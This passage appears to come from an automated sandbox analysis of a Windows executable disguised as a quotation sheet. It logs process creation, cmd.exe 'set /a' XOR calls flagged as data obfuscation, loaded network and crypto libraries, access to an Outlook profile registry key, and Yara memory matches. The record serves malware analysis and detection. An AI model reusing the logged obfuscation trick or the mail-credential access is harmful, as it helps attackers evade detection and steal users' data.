            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: z1QuotationSheetVSAA6656776.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara match | File source: 00000000.00000002.38293091270.0000000005981000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.38290946612.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5544, type: MEMORYSTR
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
